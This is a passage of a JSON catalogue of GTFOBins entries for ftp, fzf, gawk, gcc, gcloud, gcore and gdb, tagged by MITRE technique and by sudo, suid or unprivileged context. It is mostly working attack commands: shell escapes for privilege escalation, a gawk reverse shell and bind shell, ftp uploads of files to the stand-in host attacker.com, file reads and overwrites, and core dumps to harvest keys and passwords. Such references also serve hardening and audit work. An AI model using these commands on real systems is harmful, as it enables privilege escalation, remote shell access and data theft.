`-a`, credentials can be supplied via the `user:password@host` connection string.","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ftp:shell:0:sudo","toolId":"gtfo:ftp","toolName":"ftp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ftp\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ftp:shell:0:suid","toolId":"gtfo:ftp","toolName":"ftp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ftp\n!/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ftp:shell:0:unprivileged","toolId":"gtfo:ftp","toolName":"ftp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ftp\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ftp:upload:0:sudo","toolId":"gtfo:ftp","toolName":"ftp","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"ftp -a attacker.com\nput /path/to/input-file output-file","description":"Instead of `-a`, credentials can be supplied via the `user:password@host` connection string.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ftp:upload:0:suid","toolId":"gtfo:ftp","toolName":"ftp","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"ftp -a attacker.com\nput /path/to/input-file output-file","description":"Instead of `-a`, credentials can be supplied via the `user:password@host` connection string.","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ftp:upload:0:unprivileged","toolId":"gtfo:ftp","toolName":"ftp","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"ftp -a attacker.com\nput /path/to/input-file output-file","description":"Instead of `-a`, credentials can be supplied via the `user:password@host` connection string.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fzf:command:0:sudo","toolId":"gtfo:fzf","toolName":"fzf","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"fzf --listen=12345","description":"Commands can be issued via POST requests, for example:\n\n```\ncurl http://localhost:12345 -d 'execute(/path/to/command)'\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fzf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fzf:command:0:suid","toolId":"gtfo:fzf","toolName":"fzf","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"fzf --listen=12345","description":"Commands can be issued via POST requests, for example:\n\n```\ncurl http://localhost:12345 -d 'execute(/path/to/command)'\n```","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/fzf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fzf:command:0:unprivileged","toolId":"gtfo:fzf","toolName":"fzf","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"fzf --listen=12345","description":"Commands can be issued via POST requests, for example:\n\n```\ncurl http://localhost:12345 -d 'execute(/path/to/command)'\n```","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/fzf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fzf:shell:0:sudo","toolId":"gtfo:fzf","toolName":"fzf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"fzf --bind 'enter:execute(/bin/sh)'","description":"Press `Enter` to receive the shell.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fzf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fzf:shell:0:suid","toolId":"gtfo:fzf","toolName":"fzf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"fzf --bind 'enter:execute(/bin/sh)'","description":"Press `Enter` to receive the shell.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/fzf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fzf:shell:0:unprivileged","toolId":"gtfo:fzf","toolName":"fzf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"fzf --bind 'enter:execute(/bin/sh)'","description":"Press `Enter` to receive the shell.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/fzf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gawk:bind-shell:0:sudo","toolId":"gtfo:gawk","toolName":"gawk","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"gawk 'BEGIN {\n s = \"/inet/tcp/12345/0/0\";\n while (1) {printf \"> \" |& s; if ((s |& getline c) <= 0) break;\n while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gawk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nawk"]},{"id":"gtfo:gawk:bind-shell:0:suid","toolId":"gtfo:gawk","toolName":"gawk","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"gawk 'BEGIN {\n s = \"/inet/tcp/12345/0/0\";\n while (1) {printf \"> \" |& s; if ((s |& getline c) <= 0) break;\n while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gawk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nawk"]},{"id":"gtfo:gawk:bind-shell:0:unprivileged","toolId":"gtfo:gawk","toolName":"gawk","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["bind-shell"],"command":"gawk 'BEGIN {\n s = \"/inet/tcp/12345/0/0\";\n while (1) {printf \"> \" |& s; if ((s |& getline c) <= 0) break;\n while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gawk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nawk"]},{"id":"gtfo:gawk:file-read:0:sudo","toolId":"gtfo:gawk","toolName":"gawk","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"gawk '//' /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gawk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nawk"]},{"id":"gtfo:gawk:file-read:0:suid","toolId":"gtfo:gawk","toolName":"gawk","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"gawk '//' /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gawk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nawk"]},{"id":"gtfo:gawk:file-read:0:unprivileged","toolId":"gtfo:gawk","toolName":"gawk","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"gawk '//' /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gawk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nawk"]},{"id":"gtfo:gawk:file-write:0:sudo","toolId":"gtfo:gawk","toolName":"gawk","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"gawk 'BEGIN { print \"DATA\" > \"/path/to/output-file\" }'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gawk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nawk"]},{"id":"gtfo:gawk:file-write:0:suid","toolId":"gtfo:gawk","toolName":"gawk","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"gawk 'BEGIN { print \"DATA\" > \"/path/to/output-file\" }'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gawk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nawk"]},{"id":"gtfo:gawk:file-write:0:unprivileged","toolId":"gtfo:gawk","toolName":"gawk","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"gawk 'BEGIN { print \"DATA\" > \"/path/to/output-file\" }'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gawk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nawk"]},{"id":"gtfo:gawk:reverse-shell:0:sudo","toolId":"gtfo:gawk","toolName":"gawk","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"gawk 'BEGIN {\n s = \"/inet/tcp/0/attacker.com/12345\";\n while (1) {printf \"> \" |& s; if ((s |& getline c) <= 0) break;\n while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gawk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nawk"]},{"id":"gtfo:gawk:reverse-shell:0:suid","toolId":"gtfo:gawk","toolName":"gawk","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"gawk 'BEGIN {\n s = \"/inet/tcp/0/attacker.com/12345\";\n while (1) {printf \"> \" |& s; if ((s |& getline c) <= 0) break;\n while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gawk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nawk"]},{"id":"gtfo:gawk:reverse-shell:0:unprivileged","toolId":"gtfo:gawk","toolName":"gawk","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"gawk 'BEGIN {\n s = \"/inet/tcp/0/attacker.com/12345\";\n while (1) {printf \"> \" |& s; if ((s |& getline c) <= 0) break;\n while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gawk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nawk"]},{"id":"gtfo:gawk:shell:0:sudo","toolId":"gtfo:gawk","toolName":"gawk","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"gawk 'BEGIN {system(\"/bin/sh\")}'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gawk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nawk"]},{"id":"gtfo:gawk:shell:0:suid","toolId":"gtfo:gawk","toolName":"gawk","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"gawk 'BEGIN {system(\"/bin/sh\")}'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gawk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nawk"]},{"id":"gtfo:gawk:shell:0:unprivileged","toolId":"gtfo:gawk","toolName":"gawk","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"gawk 'BEGIN {system(\"/bin/sh\")}'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gawk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nawk"]},{"id":"gtfo:gcc:file-read:0:sudo","toolId":"gtfo:gcc","toolName":"gcc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"gcc -x c -E /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gcc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["c89","c99","cc","g++"]},{"id":"gtfo:gcc:file-read:0:unprivileged","toolId":"gtfo:gcc","toolName":"gcc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"gcc -x c -E /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gcc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["c89","c99","cc","g++"]},{"id":"gtfo:gcc:file-read:1:sudo","toolId":"gtfo:gcc","toolName":"gcc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"gcc @/path/to/input-file","description":"The file is read and parsed as a list of files (one per line), the content is displayed as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gcc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["c89","c99","cc","g++"]},{"id":"gtfo:gcc:file-read:1:unprivileged","toolId":"gtfo:gcc","toolName":"gcc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"gcc @/path/to/input-file","description":"The file is read and parsed as a list of files (one per line), the content is displayed as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gcc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["c89","c99","cc","g++"]},{"id":"gtfo:gcc:file-write:0:sudo","toolId":"gtfo:gcc","toolName":"gcc","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"gcc -x c /dev/null -o /path/to/input-file","description":"This actually deletes the file.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gcc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["c89","c99","cc","g++"]},{"id":"gtfo:gcc:file-write:0:unprivileged","toolId":"gtfo:gcc","toolName":"gcc","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"gcc -x c /dev/null -o /path/to/input-file","description":"This actually deletes the file.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gcc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["c89","c99","cc","g++"]},{"id":"gtfo:gcc:shell:0:sudo","toolId":"gtfo:gcc","toolName":"gcc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"gcc -wrapper /bin/sh,-s x","description":"In some older versions, the `x` argument must instead reference any existing file.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gcc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["c89","c99","cc","g++"]},{"id":"gtfo:gcc:shell:0:unprivileged","toolId":"gtfo:gcc","toolName":"gcc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"gcc -wrapper /bin/sh,-s x","description":"In some older versions, the `x` argument must instead reference any existing file.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gcc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["c89","c99","cc","g++"]},{"id":"gtfo:gcloud:inherit:0:sudo","toolId":"gtfo:gcloud","toolName":"gcloud","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"gcloud help","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gcloud/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gcloud:inherit:0:suid","toolId":"gtfo:gcloud","toolName":"gcloud","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"gcloud help","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gcloud/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gcloud:inherit:0:unprivileged","toolId":"gtfo:gcloud","toolName":"gcloud","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"gcloud help","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gcloud/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gcore:file-read:0:sudo","toolId":"gtfo:gcore","toolName":"gcore","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"gcore $PID","description":"It can be used to generate core dumps of running processes (`$PID`). Such files often contains sensitive information such as open files content, cryptographic keys, passwords, etc. This command produces a binary file named `core.$PID`, that is then often filtered with `strings` to narrow down relevant information.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gcore/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gcore:file-read:0:suid","toolId":"gtfo:gcore","toolName":"gcore","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"gcore $PID","description":"It can be used to generate core dumps of running processes (`$PID`). Such files often contains sensitive information such as open files content, cryptographic keys, passwords, etc. This command produces a binary file named `core.$PID`, that is then often filtered with `strings` to narrow down relevant information.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gcore/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gcore:file-read:0:unprivileged","toolId":"gtfo:gcore","toolName":"gcore","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"gcore $PID","description":"It can be used to generate core dumps of running processes (`$PID`). Such files often contains sensitive information such as open files content, cryptographic keys, passwords, etc. This command produces a binary file named `core.$PID`, that is then often filtered with `strings` to narrow down relevant information.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gcore/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gdb:file-write:0:sudo","toolId":"gtfo:gdb","toolName":"gdb","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"gdb -nx -ex 'dump value /path/to/output-file \"DATA\"' -ex quit","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gdb/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gdb:file-write:0:suid","toolId":"gtfo:gdb","toolName":"gdb","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"gdb -nx -ex 'dump value /path/to/output-file \"DATA\"' -ex quit","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gdb/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gdb:file-write:0:unprivileged","toolId":"gtfo:gdb","toolName":"gdb","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"gdb -nx -ex 'dump value /path/to/output-file \"DATA\"' -ex quit","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gdb/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gdb:inherit:0:sudo","toolId":"gtfo:gdb","toolName":"gdb","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"gdb -nx -ex 'python ...' -ex quit","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gdb/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gdb:inherit:0:suid","toolId":"gtfo:gdb","toolName":"gdb","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"gdb -nx -ex 'python ...' -ex quit","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gdb/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gdb:inherit:0:unprivileged","toolId":"gtfo:gdb","toolName":"gdb","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:python"],"command":"gdb -nx -ex 'python ...' -ex quit","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gdb/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gdb:shell:0:capabilities","toolId":"gtfo:gdb","toolName":"gdb","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"gdb -nx -ex 'python import os; os.setuid(0)' -ex '!/bin/sh' -ex quit","mitre":["T1059"],"privilege":"capabilities","context":"capabilities","references":["https://gtfobins.github.io/gtfobins/gdb/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gdb:shell:0:sudo","toolId":"gtfo:gdb","toolName":"gdb","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"gdb -nx -ex '!/bin/sh' -ex quit","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gdb/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gdb:shell:0:suid","toolId":"gtfo:gdb","toolName":"gdb","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege 